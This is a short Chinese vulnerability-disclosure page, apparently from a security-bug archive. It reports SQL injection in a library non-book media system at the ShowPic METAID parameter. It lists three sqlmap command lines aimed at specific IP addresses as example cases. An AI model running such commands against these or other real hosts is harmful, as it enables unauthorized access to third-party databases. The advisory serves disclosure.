某资料系统SQL注射

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 某资料系统SQL注射漏洞 ### 详细说明: 某资料系统SQL注射漏洞 ### 漏洞证明: 博文非书资料系统都会存在一个视频存储,而这个注入在 poweb/ShowPic?METAID=18920 案例一: C:\Python27\sqlmap>sqlmap.py -u "http://219.243.15.9:8080/poweb/ShowPic?METAID=7 319" -v 1 [<img src="https://images.seebug.org/upload/201503/03211711465b8f9956e354a9bae653cd88cceb1a.jpg" alt="360截图20150303211708332.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03211711465b8f9956e354a9bae653cd88cceb1a.jpg) 案例二: C:\Python27\sqlmap>sqlmap.py -u "http://210.44.1.2:8080/poweb/ShowPic?METAID=525 32" -v 1 [<img src="https://images.seebug.org/upload/201503/032117316ebcfad102e9945849ab54eca5a76296.jpg" alt="360截图20150303211730898.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/032117316ebcfad102e9945849ab54eca5a76296.jpg) 案例三: C:\Python27\sqlmap>sqlmap.py -u "http://202.206.242.26:88/poweb/ShowPic?METAID=5 2532" -v 1 [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息